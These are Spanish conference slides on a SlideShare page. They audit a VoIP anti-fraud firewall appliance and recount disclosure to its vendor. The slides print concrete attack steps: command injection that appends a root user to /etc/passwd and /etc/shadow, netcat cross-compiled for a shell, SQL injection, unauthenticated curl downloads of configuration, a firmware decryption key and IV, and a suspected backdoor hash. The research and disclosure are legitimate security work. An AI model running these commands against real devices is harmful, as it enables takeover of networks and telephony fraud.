SlideShare una empresa de Scribd logo
1 de 75
Descargar para leer sin conexión
@pepeluxx
ANALIZANDO LA SEGURIDAD DE UN
DISPOSITIVO DE SEGURIDAD
@pepeluxx
Jose Luis Verdeguer
Sobre mi
• Ingeniero Técnico de Sistemas Informáticos por la UA
• Master en Desarrollo y Programación de Apps y Servicios Web
• CTO en Zoonsuite (operador de VoIP)
• Ponente en diferentes congresos nacionales
• Autor del libro Hacking y Seguridad VoIP (de 0xWORD)
eMail: verdeguer@zoonsuite.com
Linkedin: https://www.linkedin.com/in/pepelux
Twitter: @pepeluxx
@pepeluxx
¿Es lo mismo si nos atacan un sistema de VoIP que si nos atacan
una web, un servidor de correo, o cualquier otro servicio?
¿ Son las mismas consecuencias ?
Problemas de la VoIP
@pepeluxx
Alguien que ataca una web lo suele hacer por:
• Simple diversión
• Motivos políticos
• Elevar su ego
• Robo de información
Problemas de la VoIP
@pepeluxx
Alguien que ataca un sistema de VoIP lo hace por:
• Motivos económicos
• $$$$$
• = grandes pérdidas

en poco tiempo
Problemas de la VoIP
@pepeluxx
Fraude telefónico
@pepeluxx
Fraude telefónico
@pepeluxx
Fraude telefónico
@pepeluxx
Fraude telefónico
@pepeluxx
• Una buena administración, ¿es suficiente?
• Cada día aparecen nuevas técnicas de ataque, nuevos fallos, …
• Posiblemente tenemos que proteger diferentes servicios
• PBX, Proxy, Web, TFTP, BBDD, Radius, Billing, etc
• Una buena solución es un firewall:
• Que nos ofrezca seguridad en la red
• Que además ‘sepa’ de VoIP
• Se debe tener siempre los sistemas actualizados
• Pero, no es tan sencillo
Soluciones
@pepeluxx
• Análisis de un dispositivo para evitar el fraude en VoIP
• Funcionalidad
• Seguridad del propio aparato
• Respuesta por parte del fabricante
Agenda
@pepeluxx
•Análisis de paquetes SIP basándose en reglas de Snort.
•Anomalías en el protocolo SIP.
•Ataques de fingerprinting, enumeración de usuarios y crackeo de contraseñas.
•Protección ante diferentes tipos de ataques:
•Dos/DDos.
•CSS.
•Buffer overflow.
•Vulnerabilidades conocidas.
•Detección de fraude.
•SPIT o spam telefónico y war dialing.
•Posee listas negras dinámicas, listas blancas y reglas de firewall.
•Geolocalización.
Características
@pepeluxx
Características
@pepeluxx
Características
@pepeluxx
Características
@pepeluxx
Características
@pepeluxx
Características
@pepeluxx
¿Cómo analizamos la seguridad de un dispositivo físico?
• Teniendo acceso al Firmware
• Si podemos descomprimirlo …
• … tendremos acceso a todo el sistema
• Problemas:
• Pocos fabricantes ponen el firmware en la web
• Suele venir cifrado
Análisis del dispositivo
@pepeluxx
¿Cómo analizamos la seguridad de un dispositivo físico?
• Accediendo a los paneles de administración
• Web
• SSH
• Telnet
• Problemas:
• Análisis a ciegas
Análisis del dispositivo
@pepeluxx
¿Cómo analizamos la seguridad de un dispositivo físico?
• Mediante puertos habilitados para la administración
• Puertos de consola (si hay)
• UART, JTAG, etc
• Problemas:
• Si no hay puerto de consola …
• … tenemos que abrirlo = pérdida de garantía
• Es posible que tengamos que soldar
Análisis del dispositivo
@pepeluxx
• No tenemos acceso al firmware completo.
• Podemos descargar actualizaciones desde la web
del fabricante.
• Vienen cifradas y no podemos meterle mano.
Firmware
@pepeluxx
Para testearlo usaremos:
• Un switch para crear una red local
• Un Asterisk en una Raspberry PI
• El dispositivo de seguridad :)
• Un portátil desde donde lanzaremos los ataques
Herramientas
@pepeluxx
Analizando la funcionalidad del dispositivo
@pepeluxx
Funcionalidad (Panel web)
@pepeluxx
Funcionalidad (Panel web)
@pepeluxx
Funcionalidad (Panel web)
@pepeluxx
Funcionalidad (Panel web)
@pepeluxx
• Programa de comandos
• Exit
Funcionalidad (Acceso SSH)
@pepeluxx
• svmap.py: localizar dispositivos y fingerprinting
• svwar.py: enumerar extensiones
• svcrack.py: crackear contraseñas por fuerza bruta
• svcrash.py: bloquear ataques de SIPVicious
• svreport.py: elaborar informes
Funcionalidad (SIPVicious)
@pepeluxx
Funcionalidad (SIPVicious)
@pepeluxx
Funcionalidad (SIPVicious)
@pepeluxx
Funcionalidad (SIPVicious)
@pepeluxx
Funcionalidad (INVITE attack)
@pepeluxx
•Análisis de paquetes SIP basándose en reglas de Snort.
•Anomalías en el protocolo SIP.
•Ataques de fingerprinting, enumeración de usuarios y crackeo de contraseñas.
•Protección ante diferentes tipos de ataques:
•Dos/DDos.
•CSS.
•Buffer overflow.
•Vulnerabilidades conocidas.
•Detección de fraude.
•SPIT o spam telefónico y war dialing.
•Posee listas negras dinámicas, listas blancas y reglas de firewall.
•Geolocalización.
???
Características
@pepeluxx
Analizando la seguridad del dispositivo
@pepeluxx
¿Ejecutará la aplicación comandos propios o del sistema?
Análisis: SSH
@pepeluxx
Análisis: SSH
@pepeluxx
Análisis: SSH
@pepeluxx
¿Estarán bien filtradas las llamadas al sistema?
Análisis: Panel Web
@pepeluxx
Análisis: Panel Web
@pepeluxx
Repetimos el mismo proceso para sacar un listado de ficheros:
• ls / -R > /tmp/salida
• Ruta web: /home/stm/www/htdocs/shield/
• Redirigimos la salida a una ruta accesible vía web
• Leemos de forma más fácil con un GET
Análisis: Panel Web
@pepeluxx
Análisis: Panel Web
@pepeluxx
Cabe la posibilidad de que el SSH no esté activo
O que no sepamos la contraseña de acceso
$ ./stm.sh "echo 'pepelux:x:0:0:root:/root:/bin/sh'>>/etc/passwd" 0
$ ./stm.sh "echo 'pepelux:$1$iZkveuzd$KV.232Z0uQ1TqNQxGiMne.:
10933:0:99999:7:::'>>/etc/shadow" 0 (pass 123456)
Análisis: Panel Web
@pepeluxx
Si no tenemos acceso por SSH
Podemos compilar netcat para MIPS (en este caso Little Endian)
• Toolchains para MIPS LE:
http://download1.dd-wrt.com/dd-wrtv2/downloads/toolchains/toolchains.tar.xz
• Versión simplificada de Netcat:
http://download.savannah.gnu.org/releases/netkitty/nk-1.9.tar.gz
• Compilando la aplicación:
$ mipsel-linux-uclibc-gcc -static -o nk-mips nk.c
Análisis: Panel Web
@pepeluxx
Si no tenemos acceso por SSH
Análisis: Panel Web
@pepeluxx
SQL Injection al autenticar el usuario
SQL Injection en UNAME
Análisis: Panel Web
@pepeluxx
Análisis del fichero de autenticación
• View/login.php
• include(“../Control/web_users.php”);
Una BBDD en SQLite accesible desde la URL … tendrá un .htaccess, ¿no?
• Control/web_users.php
• include(“../Model/db_mgr.php”);
• Model/db_mgr.php
• private static $DB_FILE_ACTIVE = "../DB/stm.db";
Análisis: Panel Web
@pepeluxx
BBDD en SQLite
Análisis: Panel Web
@pepeluxx
Análisis del código PHP
Compara el password en MD5 de la BBDD
con el password MD5 ya generado ¿WTF?
Análisis: Panel Web
@pepeluxx
Análisis: Panel Web
@pepeluxx
Si nos encontramos con un aparato de estos
• Descargamos la BBDD con un GET
• Accedemos al panel con el MD5
• Ya tenemos inyección de comandos
• Nos creamos nuestro propio usuario
• Eliminamos el .profile
• Accedemos por SSH
• Tenemos una bonita shell como root
Recapitulando …
@pepeluxx
Análisis: Otros servicios
@pepeluxx
Análisis: Otros servicios
@pepeluxx
Espera entrada de datos
¿ Primer valor == set ?
Imprime datos de br0:
• IP
• Netmask
• MAC address
Setea interfaz br0:
• IP
• Netmask
• MAC address
Espera: IP|Netmask|MAC
No
Sí
Análisis: Otros servicios
@pepeluxx
•Análisis de paquetes SIP basándose en reglas de Snort.
•Anomalías en el protocolo SIP.
•Ataques de fingerprinting, enumeración de usuarios y crackeo de contraseñas.
•Protección ante diferentes tipos de ataques:
•Dos/DDos.
•CSS.
•Buffer overflow.
•Vulnerabilidades conocidas.
•Detección de fraude.
•SPIT o spam telefónico y war dialing.
•Posee listas negras dinámicas, listas blancas y reglas de firewall.
•Geolocalización.
???
Características
@pepeluxx
Analizar el maincli
¿ Qué más podemos hacer ?
@pepeluxx
mmm … ¿una backdoor sólo conocida por el fabricante?
¿ Qué más podemos hacer ?
@pepeluxx
mmm … ¿una backdoor sólo conocida por el fabricante?
¿ Qué más podemos hacer ?
@pepeluxx
mmm … ¿una backdoor sólo conocida por el fabricante?
sha1 (sin salt): 81f7d39814fd68035fd07f1c74999bbd34af0237
¿ Qué más podemos hacer ?
@pepeluxx
mmm … ¿una backdoor sólo conocida por el fabricante?
¿ Qué más podemos hacer ?
@pepeluxx
Ver cómo descifra el firmware
$ openssl enc -aes-256-cbc -d -salt
-S 3259545633584c4e32594c524c4456394d434b43000a
-K 325959465859484232594656564d573833584c4a4742485632434b55000a
-iv 3176302e000 -in stm_update.bin -out stm_update2.bin
¿ Qué más podemos hacer ?
@pepeluxx
Aviso al fabricante
@pepeluxx
Mediados de Julio:
• Envío todos los fallos descubiertos.
• Le sugiero que contrate una auditoría urgentemente con una empresa
especializada.
Respuesta rápida por parte del fabricante:
• Muchas gracias por el aviso.
• Nos vamos a centrar en solucionarlo.
Aviso al fabricante
@pepeluxx
Finales de Agosto (mail del fabricante):
• Lo hemos solucionado todo.
• Te vamos a mandar un dispositivo nuevo con la versión 2.0.
• Esperamos el feedback por tu parte.
¿ Realmente no se pueden permitir pagar una auditoría ?
Aviso al fabricante
@pepeluxx
Finales de Septiembre:
• Me llega el dispositivo desde La India.
Principales cambios:
• Nueva caja más compacta.
• Cambio de MIPS a ARM.
• Distribución Debian con ¿¿ SID ??
Aviso al fabricante
@pepeluxx
Tras recibir el aparato nuevo:
• Lo conecto a la red, accedo a la web.
• Y 10 min más tarde le envío esto al fabricante:
Le vuelvo a sugerir que contrate una auditoría.
• No están por la labor.
• Lo único que quieren es que les diga cómo entré.
Aviso al fabricante
@pepeluxx
Mismo sitio, diferente parámetro
Problemas
@pepeluxx
En este caso conozco la contraseña del panel
Los fallos que les comenté están solucionados:
•Ya no puedo descargar la BBDD con un GET
•Ya no puedo inyectar en el login
Podemos descargar un backup de la BBDD cifrada:
•curl --insecure https://192.168.1.222/View/download.php?id=db
Pero el fichero PHP del panel que descarga la configuración del usuario
(la BBDD cifrada) no comprueba la variable de sesión
Problemas
@pepeluxx
Configuración del usuario
Problemas
@pepeluxx
Más ficheros que no verifican la variable de sesión
El panel sólo permite un usuario activo. Si se autentica correctamente un segundo usuario, echa
al primero.
Podemos echar al usuario activo sin autenticarnos:
•curl --insecure -d “config=Continue” https://192.168.1.222/View/login_multi_attempt.php
•También hay otras partes del panel que no verifican la sesión:
Podemos descargar toda la configuración del sistema:
•curl --insecure https://192.168.1.222/View/download.php?id=diagnostics
O descargar las alertas detectadas por el dispositivo:
•curl --insecure https://192.168.1.222/View/download.php?id=alert
Problemas
@pepeluxx
¿ Cuál es el problema ?
En materia de seguridad hay:
•Falta de conocimientos.
•Falta de concienciación.
•Falta de interés.
Problemas
@pepeluxx
¿ Qué ocurre si inyectamos código en el hostname ?
•El dispositivo entra en un bucle de reinicios.
•¡¡ Tuve que reflashearlo !!
Problemas
@pepeluxx
Y lo peor de todo …
•Han desarrollado una nueva versión 2.0
•Está basada en arquitectura ARM.
Pero, ¿ qué hay de los clientes que tiene la versión 1.0
basada en arquitectura MIPS ? ¿va a haber nuevo
firmware o hay que comprar un nuevo dispositivo?
Problemas
@pepeluxx
Muchas veces surgen buenas ideas con buenas intenciones
•Es importante analizar no sólo la funcionalidad y la usabilidad.
•Sino también la seguridad del propio dispositivo.
En este caso, un dispositivo que debe bloquear ataques hacia nuestra PBX
•Permite que se nos cuelen en nuestra red:
•Acceso a todo el sistema.
•Ya no hay firewall de por medio.
•Monitorización de tráfico.
Conclusiones
@pepeluxx
GRACIAS a tod@s
GRACIAS a todos
Espero que os haya gustado :)

Más contenido relacionado

La actualidad más candente

Seguridad en Asterisk: Un acercamiento detallado
Seguridad en Asterisk: Un acercamiento detalladoSeguridad en Asterisk: Un acercamiento detallado
Seguridad en Asterisk: Un acercamiento detalladoPaloSanto Solutions
 
Alberto García de Dios - Virus, el arte no debería ser negocio [Rooted CON 2011]
Alberto García de Dios - Virus, el arte no debería ser negocio [Rooted CON 2011]Alberto García de Dios - Virus, el arte no debería ser negocio [Rooted CON 2011]
Alberto García de Dios - Virus, el arte no debería ser negocio [Rooted CON 2011]RootedCON
 
Elastix y la serie GXP21XX de Grandstream: funcionalidades, integración, pers...
Elastix y la serie GXP21XX de Grandstream: funcionalidades, integración, pers...Elastix y la serie GXP21XX de Grandstream: funcionalidades, integración, pers...
Elastix y la serie GXP21XX de Grandstream: funcionalidades, integración, pers...PaloSanto Solutions
 
El control de la informacion
El control de la informacionEl control de la informacion
El control de la informacionElio Rojano
 
Rooted2020 Atacando comunicaciones-de_voz_cifradas_-_jose_luis_verdeguer
Rooted2020 Atacando comunicaciones-de_voz_cifradas_-_jose_luis_verdeguerRooted2020 Atacando comunicaciones-de_voz_cifradas_-_jose_luis_verdeguer
Rooted2020 Atacando comunicaciones-de_voz_cifradas_-_jose_luis_verdeguerRootedCON
 
Las 12 pruebas de Asterisk
Las 12 pruebas de AsteriskLas 12 pruebas de Asterisk
Las 12 pruebas de AsteriskElio Rojano
 
Cómo instalar un servidor VPN de emergencia para una PYME en 5 minutos
Cómo instalar un servidor VPN de emergencia para una PYME en 5 minutosCómo instalar un servidor VPN de emergencia para una PYME en 5 minutos
Cómo instalar un servidor VPN de emergencia para una PYME en 5 minutosElio Rojano
 
Profundizando manager
Profundizando managerProfundizando manager
Profundizando managerElio Rojano
 
Seguridad En Bluetooth Y Windows Mobile
Seguridad En Bluetooth Y Windows MobileSeguridad En Bluetooth Y Windows Mobile
Seguridad En Bluetooth Y Windows MobileChema Alonso
 
Usando Docker con sistemas Asterisk
Usando Docker con sistemas AsteriskUsando Docker con sistemas Asterisk
Usando Docker con sistemas AsteriskElio Rojano
 
Vins Villaplana - Seguridad en capa de enlace [RootedCON 2011]
Vins Villaplana - Seguridad en capa de enlace [RootedCON 2011]Vins Villaplana - Seguridad en capa de enlace [RootedCON 2011]
Vins Villaplana - Seguridad en capa de enlace [RootedCON 2011]RootedCON
 
Control y Administración de Usuario desde el teléfono GXV3240/GXV3275
Control y Administración de Usuario desde el teléfono GXV3240/GXV3275Control y Administración de Usuario desde el teléfono GXV3240/GXV3275
Control y Administración de Usuario desde el teléfono GXV3240/GXV3275PaloSanto Solutions
 
Pentest - El Arte de la Guerra
Pentest - El Arte de la GuerraPentest - El Arte de la Guerra
Pentest - El Arte de la GuerraLuis Cortes Zavala
 
Presentacion kali linux
Presentacion kali linuxPresentacion kali linux
Presentacion kali linuxKevin Medina
 
Mariano Palomo - Taller de reversing en sistemas Windows aplicado a CTFs [ro...
Mariano Palomo  - Taller de reversing en sistemas Windows aplicado a CTFs [ro...Mariano Palomo  - Taller de reversing en sistemas Windows aplicado a CTFs [ro...
Mariano Palomo - Taller de reversing en sistemas Windows aplicado a CTFs [ro...RootedCON
 
José Selvi - Unprivileged Network Post-Exploitation [RootedCON 2011]
José Selvi - Unprivileged Network Post-Exploitation [RootedCON 2011]José Selvi - Unprivileged Network Post-Exploitation [RootedCON 2011]
José Selvi - Unprivileged Network Post-Exploitation [RootedCON 2011]RootedCON
 

La actualidad más candente (20)

(in) seguridad en VoIP
(in) seguridad en VoIP(in) seguridad en VoIP
(in) seguridad en VoIP
 
Seguridad en Asterisk: Un acercamiento detallado
Seguridad en Asterisk: Un acercamiento detalladoSeguridad en Asterisk: Un acercamiento detallado
Seguridad en Asterisk: Un acercamiento detallado
 
Alberto García de Dios - Virus, el arte no debería ser negocio [Rooted CON 2011]
Alberto García de Dios - Virus, el arte no debería ser negocio [Rooted CON 2011]Alberto García de Dios - Virus, el arte no debería ser negocio [Rooted CON 2011]
Alberto García de Dios - Virus, el arte no debería ser negocio [Rooted CON 2011]
 
Elastix y la serie GXP21XX de Grandstream: funcionalidades, integración, pers...
Elastix y la serie GXP21XX de Grandstream: funcionalidades, integración, pers...Elastix y la serie GXP21XX de Grandstream: funcionalidades, integración, pers...
Elastix y la serie GXP21XX de Grandstream: funcionalidades, integración, pers...
 
El control de la informacion
El control de la informacionEl control de la informacion
El control de la informacion
 
Rooted2020 Atacando comunicaciones-de_voz_cifradas_-_jose_luis_verdeguer
Rooted2020 Atacando comunicaciones-de_voz_cifradas_-_jose_luis_verdeguerRooted2020 Atacando comunicaciones-de_voz_cifradas_-_jose_luis_verdeguer
Rooted2020 Atacando comunicaciones-de_voz_cifradas_-_jose_luis_verdeguer
 
Las 12 pruebas de Asterisk
Las 12 pruebas de AsteriskLas 12 pruebas de Asterisk
Las 12 pruebas de Asterisk
 
Cómo instalar un servidor VPN de emergencia para una PYME en 5 minutos
Cómo instalar un servidor VPN de emergencia para una PYME en 5 minutosCómo instalar un servidor VPN de emergencia para una PYME en 5 minutos
Cómo instalar un servidor VPN de emergencia para una PYME en 5 minutos
 
Profundizando manager
Profundizando managerProfundizando manager
Profundizando manager
 
Propietario
PropietarioPropietario
Propietario
 
Kali linux
Kali linuxKali linux
Kali linux
 
Seguridad En Bluetooth Y Windows Mobile
Seguridad En Bluetooth Y Windows MobileSeguridad En Bluetooth Y Windows Mobile
Seguridad En Bluetooth Y Windows Mobile
 
Usando Docker con sistemas Asterisk
Usando Docker con sistemas AsteriskUsando Docker con sistemas Asterisk
Usando Docker con sistemas Asterisk
 
Vins Villaplana - Seguridad en capa de enlace [RootedCON 2011]
Vins Villaplana - Seguridad en capa de enlace [RootedCON 2011]Vins Villaplana - Seguridad en capa de enlace [RootedCON 2011]
Vins Villaplana - Seguridad en capa de enlace [RootedCON 2011]
 
Control y Administración de Usuario desde el teléfono GXV3240/GXV3275
Control y Administración de Usuario desde el teléfono GXV3240/GXV3275Control y Administración de Usuario desde el teléfono GXV3240/GXV3275
Control y Administración de Usuario desde el teléfono GXV3240/GXV3275
 
Pentest - El Arte de la Guerra
Pentest - El Arte de la GuerraPentest - El Arte de la Guerra
Pentest - El Arte de la Guerra
 
Presentacion kali linux
Presentacion kali linuxPresentacion kali linux
Presentacion kali linux
 
Kali linux v2_re_y_des
Kali linux v2_re_y_desKali linux v2_re_y_des
Kali linux v2_re_y_des
 
Mariano Palomo - Taller de reversing en sistemas Windows aplicado a CTFs [ro...
Mariano Palomo  - Taller de reversing en sistemas Windows aplicado a CTFs [ro...Mariano Palomo  - Taller de reversing en sistemas Windows aplicado a CTFs [ro...
Mariano Palomo - Taller de reversing en sistemas Windows aplicado a CTFs [ro...
 
José Selvi - Unprivileged Network Post-Exploitation [RootedCON 2011]
José Selvi - Unprivileged Network Post-Exploitation [RootedCON 2011]José Selvi - Unprivileged Network Post-Exploitation [RootedCON 2011]
José Selvi - Unprivileged Network Post-Exploitation [RootedCON 2011]
 

Destacado

Kent%20Political%20Almanac%20Fourth%20Issue
Kent%20Political%20Almanac%20Fourth%20IssueKent%20Political%20Almanac%20Fourth%20Issue
Kent%20Political%20Almanac%20Fourth%20IssueAnna Lederer
 
Presentación In Motion
Presentación In MotionPresentación In Motion
Presentación In Motionrodrocolodro
 
Mesa Grande v. United States
Mesa Grande v. United StatesMesa Grande v. United States
Mesa Grande v. United StatesDerril Jordan
 
Gdz angliskiy myasoedova_2014
Gdz angliskiy myasoedova_2014Gdz angliskiy myasoedova_2014
Gdz angliskiy myasoedova_2014Lucky Alex
 
Pidruchnik geometr bilanina
Pidruchnik geometr bilaninaPidruchnik geometr bilanina
Pidruchnik geometr bilaninaLucky Alex
 
Archivio124
Archivio124Archivio124
Archivio124rapacro
 
Летопись ГУО "Пальминской средней школы"
Летопись ГУО "Пальминской средней школы"Летопись ГУО "Пальминской средней школы"
Летопись ГУО "Пальминской средней школы"palm_school
 
Levermore_Golf Tournament Packet 10.24.14
Levermore_Golf Tournament Packet 10.24.14Levermore_Golf Tournament Packet 10.24.14
Levermore_Golf Tournament Packet 10.24.14Kevin Levermore
 
Christopher Howat Resume
Christopher Howat ResumeChristopher Howat Resume
Christopher Howat ResumeChris Howat
 

Destacado (18)

Kent%20Political%20Almanac%20Fourth%20Issue
Kent%20Political%20Almanac%20Fourth%20IssueKent%20Political%20Almanac%20Fourth%20Issue
Kent%20Political%20Almanac%20Fourth%20Issue
 
Presentación In Motion
Presentación In MotionPresentación In Motion
Presentación In Motion
 
Resume Shallin Tan
Resume Shallin TanResume Shallin Tan
Resume Shallin Tan
 
II Torneo Benéfico Balonmano_28.Abril.2012
II Torneo Benéfico Balonmano_28.Abril.2012II Torneo Benéfico Balonmano_28.Abril.2012
II Torneo Benéfico Balonmano_28.Abril.2012
 
La historia de la tecnologia
La historia de la tecnologiaLa historia de la tecnologia
La historia de la tecnologia
 
Mesa Grande v. United States
Mesa Grande v. United StatesMesa Grande v. United States
Mesa Grande v. United States
 
Ro
RoRo
Ro
 
Gdz angliskiy myasoedova_2014
Gdz angliskiy myasoedova_2014Gdz angliskiy myasoedova_2014
Gdz angliskiy myasoedova_2014
 
Pidruchnik geometr bilanina
Pidruchnik geometr bilaninaPidruchnik geometr bilanina
Pidruchnik geometr bilanina
 
Archivio124
Archivio124Archivio124
Archivio124
 
Educini6
Educini6Educini6
Educini6
 
Летопись ГУО "Пальминской средней школы"
Летопись ГУО "Пальминской средней школы"Летопись ГУО "Пальминской средней школы"
Летопись ГУО "Пальминской средней школы"
 
Levermore_Golf Tournament Packet 10.24.14
Levermore_Golf Tournament Packet 10.24.14Levermore_Golf Tournament Packet 10.24.14
Levermore_Golf Tournament Packet 10.24.14
 
Proyecto de grado
Proyecto de gradoProyecto de grado
Proyecto de grado
 
Christopher Howat Resume
Christopher Howat ResumeChristopher Howat Resume
Christopher Howat Resume
 
Hotel Flor de Tocuyito
Hotel Flor de TocuyitoHotel Flor de Tocuyito
Hotel Flor de Tocuyito
 
Physics&Maths_description courses
Physics&Maths_description coursesPhysics&Maths_description courses
Physics&Maths_description courses
 
Evolucion de internet
Evolucion de internetEvolucion de internet
Evolucion de internet
 

Similar a José Luis Verdeguer - VoIP2DAY 2016 | Analizando la seguridad de los productos de seguridad

Cibercrimen Fraude Y Malware Mikel Gastesi
Cibercrimen   Fraude Y Malware   Mikel GastesiCibercrimen   Fraude Y Malware   Mikel Gastesi
Cibercrimen Fraude Y Malware Mikel GastesiChema Alonso
 
Hack & beers lleida seguridad en desarrollo fullstack
Hack & beers lleida   seguridad en desarrollo fullstackHack & beers lleida   seguridad en desarrollo fullstack
Hack & beers lleida seguridad en desarrollo fullstackMarc Pàmpols
 
Ransonware: introducción a nuevo Virus Informático
Ransonware: introducción a nuevo Virus InformáticoRansonware: introducción a nuevo Virus Informático
Ransonware: introducción a nuevo Virus InformáticoJuan Astudillo
 
Virus, el arte de algunos - Alberto García de Dios (/Rooted CON 2011)
Virus, el arte de algunos - Alberto García de Dios (/Rooted CON 2011)Virus, el arte de algunos - Alberto García de Dios (/Rooted CON 2011)
Virus, el arte de algunos - Alberto García de Dios (/Rooted CON 2011)Oskar Laguillo
 
Osmius
OsmiusOsmius
OsmiusTensor
 
WEBINAR : WINDOWS 2019 HARDENING (Aseguramiento)
WEBINAR : WINDOWS 2019 HARDENING (Aseguramiento)WEBINAR : WINDOWS 2019 HARDENING (Aseguramiento)
WEBINAR : WINDOWS 2019 HARDENING (Aseguramiento)Cristian Garcia G.
 
WINDOWS 2019 HARDENING (Aseguramiento)
WINDOWS 2019 HARDENING (Aseguramiento)WINDOWS 2019 HARDENING (Aseguramiento)
WINDOWS 2019 HARDENING (Aseguramiento)Cristian Garcia G.
 
Osmius, Herramientas SNMP
Osmius, Herramientas SNMPOsmius, Herramientas SNMP
Osmius, Herramientas SNMPkinito2h
 
Laboratorios de Entrenamiento en Seguridad Informática - FLISOL 2010
Laboratorios de Entrenamiento en Seguridad Informática - FLISOL 2010Laboratorios de Entrenamiento en Seguridad Informática - FLISOL 2010
Laboratorios de Entrenamiento en Seguridad Informática - FLISOL 20104v4t4r
 
Securización de sistemas de VoIP - JOSÉ LUIS VERDEGUER - VoIP2DAY 2017
Securización de sistemas de VoIP - JOSÉ LUIS VERDEGUER - VoIP2DAY 2017Securización de sistemas de VoIP - JOSÉ LUIS VERDEGUER - VoIP2DAY 2017
Securización de sistemas de VoIP - JOSÉ LUIS VERDEGUER - VoIP2DAY 2017VOIP2DAY
 
Web App Hacking and Penetration Testing - (RFI - LFI & RCE)
Web App Hacking and Penetration Testing - (RFI - LFI & RCE) Web App Hacking and Penetration Testing - (RFI - LFI & RCE)
Web App Hacking and Penetration Testing - (RFI - LFI & RCE) Jose Gonzales
 
Ataques de denegacion de servicio
Ataques de denegacion de servicioAtaques de denegacion de servicio
Ataques de denegacion de servicioCamilo Fernandez
 
Kali linux guia español
Kali linux guia españolKali linux guia español
Kali linux guia españolIt-servicios
 
Kali linux guia español
Kali linux guia españolKali linux guia español
Kali linux guia españolKrls Avilez
 
Seguridad en Servidores Dedicados
Seguridad en Servidores DedicadosSeguridad en Servidores Dedicados
Seguridad en Servidores DedicadosNominalia
 
Ramón Pinuaga - Authenticode para malotes [rooted2017]
Ramón Pinuaga - Authenticode para malotes [rooted2017]Ramón Pinuaga - Authenticode para malotes [rooted2017]
Ramón Pinuaga - Authenticode para malotes [rooted2017]RootedCON
 
Construyendo tu propio laboratorio de pentesting
Construyendo tu propio laboratorio de pentestingConstruyendo tu propio laboratorio de pentesting
Construyendo tu propio laboratorio de pentestingJaime Andrés Bello Vieda
 

Similar a José Luis Verdeguer - VoIP2DAY 2016 | Analizando la seguridad de los productos de seguridad (20)

webminar ataques de fuerza bruta kali linux
webminar ataques de fuerza bruta kali linux webminar ataques de fuerza bruta kali linux
webminar ataques de fuerza bruta kali linux
 
Cibercrimen Fraude Y Malware Mikel Gastesi
Cibercrimen   Fraude Y Malware   Mikel GastesiCibercrimen   Fraude Y Malware   Mikel Gastesi
Cibercrimen Fraude Y Malware Mikel Gastesi
 
Hack & beers lleida seguridad en desarrollo fullstack
Hack & beers lleida   seguridad en desarrollo fullstackHack & beers lleida   seguridad en desarrollo fullstack
Hack & beers lleida seguridad en desarrollo fullstack
 
Ransonware: introducción a nuevo Virus Informático
Ransonware: introducción a nuevo Virus InformáticoRansonware: introducción a nuevo Virus Informático
Ransonware: introducción a nuevo Virus Informático
 
Virus, el arte de algunos - Alberto García de Dios (/Rooted CON 2011)
Virus, el arte de algunos - Alberto García de Dios (/Rooted CON 2011)Virus, el arte de algunos - Alberto García de Dios (/Rooted CON 2011)
Virus, el arte de algunos - Alberto García de Dios (/Rooted CON 2011)
 
Osmius
OsmiusOsmius
Osmius
 
WEBINAR : WINDOWS 2019 HARDENING (Aseguramiento)
WEBINAR : WINDOWS 2019 HARDENING (Aseguramiento)WEBINAR : WINDOWS 2019 HARDENING (Aseguramiento)
WEBINAR : WINDOWS 2019 HARDENING (Aseguramiento)
 
WINDOWS 2019 HARDENING (Aseguramiento)
WINDOWS 2019 HARDENING (Aseguramiento)WINDOWS 2019 HARDENING (Aseguramiento)
WINDOWS 2019 HARDENING (Aseguramiento)
 
Osmius, Herramientas SNMP
Osmius, Herramientas SNMPOsmius, Herramientas SNMP
Osmius, Herramientas SNMP
 
Laboratorios de Entrenamiento en Seguridad Informática - FLISOL 2010
Laboratorios de Entrenamiento en Seguridad Informática - FLISOL 2010Laboratorios de Entrenamiento en Seguridad Informática - FLISOL 2010
Laboratorios de Entrenamiento en Seguridad Informática - FLISOL 2010
 
Securización de sistemas de VoIP - JOSÉ LUIS VERDEGUER - VoIP2DAY 2017
Securización de sistemas de VoIP - JOSÉ LUIS VERDEGUER - VoIP2DAY 2017Securización de sistemas de VoIP - JOSÉ LUIS VERDEGUER - VoIP2DAY 2017
Securización de sistemas de VoIP - JOSÉ LUIS VERDEGUER - VoIP2DAY 2017
 
Web App Hacking and Penetration Testing - (RFI - LFI & RCE)
Web App Hacking and Penetration Testing - (RFI - LFI & RCE) Web App Hacking and Penetration Testing - (RFI - LFI & RCE)
Web App Hacking and Penetration Testing - (RFI - LFI & RCE)
 
Ataques de denegacion de servicio
Ataques de denegacion de servicioAtaques de denegacion de servicio
Ataques de denegacion de servicio
 
Kali linux guia español
Kali linux guia españolKali linux guia español
Kali linux guia español
 
Kali linux guia español
Kali linux guia españolKali linux guia español
Kali linux guia español
 
Kali linux guia español
Kali linux guia españolKali linux guia español
Kali linux guia español
 
Seguridad en Servidores Dedicados
Seguridad en Servidores DedicadosSeguridad en Servidores Dedicados
Seguridad en Servidores Dedicados
 
Ramón Pinuaga - Authenticode para malotes [rooted2017]
Ramón Pinuaga - Authenticode para malotes [rooted2017]Ramón Pinuaga - Authenticode para malotes [rooted2017]
Ramón Pinuaga - Authenticode para malotes [rooted2017]
 
Semana de la I+D - Proyecto OPOSSUM
Semana de la I+D - Proyecto OPOSSUMSemana de la I+D - Proyecto OPOSSUM
Semana de la I+D - Proyecto OPOSSUM
 
Construyendo tu propio laboratorio de pentesting
Construyendo tu propio laboratorio de pentestingConstruyendo tu propio laboratorio de pentesting
Construyendo tu propio laboratorio de pentesting
 

Último

Plan Sarmiento - Netbook del GCBA 2019..
Plan Sarmiento - Netbook del GCBA 2019..Plan Sarmiento - Netbook del GCBA 2019..
Plan Sarmiento - Netbook del GCBA 2019..RobertoGumucio2
 
La era de la educación digital y sus desafios
La era de la educación digital y sus desafiosLa era de la educación digital y sus desafios
La era de la educación digital y sus desafiosFundación YOD YOD
 
El uso delas tic en la vida cotidiana MFEL
El uso delas tic en la vida cotidiana MFELEl uso delas tic en la vida cotidiana MFEL
El uso delas tic en la vida cotidiana MFELmaryfer27m
 
R1600G CAT Variables de cargadores en mina
R1600G CAT Variables de cargadores en minaR1600G CAT Variables de cargadores en mina
R1600G CAT Variables de cargadores en minaarkananubis
 
Crear un recurso multimedia. Maricela_Ponce_DomingoM1S3AI6-1.pptx
Crear un recurso multimedia. Maricela_Ponce_DomingoM1S3AI6-1.pptxCrear un recurso multimedia. Maricela_Ponce_DomingoM1S3AI6-1.pptx
Crear un recurso multimedia. Maricela_Ponce_DomingoM1S3AI6-1.pptxNombre Apellidos
 
